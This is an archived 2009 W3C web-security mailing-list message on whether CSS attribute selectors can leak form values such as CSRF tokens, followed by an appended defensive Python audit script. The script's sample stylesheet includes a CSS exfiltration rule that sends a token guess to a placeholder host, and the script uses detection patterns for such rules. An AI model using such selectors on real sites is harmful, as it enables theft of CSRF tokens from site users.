- From: Maciej Stachowiak <mjs@apple.com>
- Date: Sat, 05 Dec 2009 18:42:01 -0800
- To: Maciej Stachowiak <mjs@apple.com>
- Cc: Collin Jackson <w3c@collinjackson.com>, Boris Zbarsky <bzbarsky@mit.edu>, Adam Barth <w3c@adambarth.com>, sird@rckc.at, public-web-security@w3.org
On Dec 5, 2009, at 6:17 PM, Maciej Stachowiak wrote:

>
> On Dec 5, 2009, at 12:43 PM, Collin Jackson wrote:
>
>> On Sat, Dec 5, 2009 at 11:05 AM, Boris Zbarsky <bzbarsky@mit.edu> wrote:
>>> On 12/5/09 1:05 PM, Collin Jackson wrote:
>>>> It seems like CSS3 is adding a lot of attack surface
>>>
>>> Maybe I'm missing something... what attack surface is being added here,
>>> exactly? Attribute selectors?
>>
>> Right. Attribute selectors that can read the values of input fields
>> and send the result over the network.
>
> An attribute selector on the value attribute can't read the actual
> value of an input field, only the default value.

To be fair though, while this won't help you learn anything about passwords, it could tell you about a CSRF-defense secret token that's embedded in the form via <input type="hidden" value="XXXXXX">.

Regards,
Maciej

Received on Sunday, 6 December 2009 02:42:36 UTC
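
An added example, not part of the original message and not code from anyone in the thread: a Python audit for the distinction drawn above. It lists the form inputs whose value is written in the markup (the default value an attribute selector can match) and flags stylesheet rules that key on `value` and also load a URL. The function names, the sample markup and stylesheet, and the host `third-party.example` are constructed assumptions.

```python
import re
from html.parser import HTMLParser

COMMENT = re.compile(r"/\*.*?\*/", re.S)
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")  # innermost "selector { body }"
# [value], [value="x"], [value^=x] ... but not [data-value] or [valued]
VALUE_ATTR = re.compile(r"\[\s*value\s*(?:[~|^$*]?=[^\]]*)?\]", re.I)
# url(...) targets that cause a fetch; inline data: URIs are skipped
URL_FETCH = re.compile(r"url\(\s*[\"']?\s*(?!data:)([^\"')\s]+)", re.I)

def find_value_selector_fetches(css):
    """Return (selector, urls) for rules that key on `value` and load a URL."""
    findings = []
    for m in RULE.finditer(COMMENT.sub("", css)):
        selector, body = m.group(1).strip(), m.group(2)
        urls = URL_FETCH.findall(body)
        if urls and VALUE_ATTR.search(selector):
            findings.append((selector, urls))
    return findings

class MarkupValues(HTMLParser):
    """Collect inputs whose value is written in the markup (the default value)."""
    def __init__(self):
        super().__init__()
        self.exposed = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("value"):
            self.exposed.append((a.get("type", "text"), a.get("name")))

def selector_reachable_inputs(html):
    """Inputs a value-attribute selector can match, as (type, name) pairs."""
    parser = MarkupValues()
    parser.feed(html)
    return parser.exposed

# Constructed sample inputs for illustration (not taken from the thread).
SAMPLE_HTML = '''<form method="post">
<input type="hidden" name="csrf_token" value="XXXXXX">
<input type="password" name="pw">
</form>'''
SAMPLE_CSS = '''/* constructed stylesheet */
input[type=text] { background: url(/img/field.png) }
input[name="csrf_token"][value^="X"] { background: url(//third-party.example/x) }
input[value] { background: url(data:image/gif;base64,AAAA) }
'''

if __name__ == "__main__":
    print(selector_reachable_inputs(SAMPLE_HTML), find_value_selector_fetches(SAMPLE_CSS))
```

On the sample, the hidden token field is reported as markup-supplied while the password field, which has no `value` attribute in the markup, is not; only the stylesheet rule that combines a `value` selector with a non-inline URL is flagged.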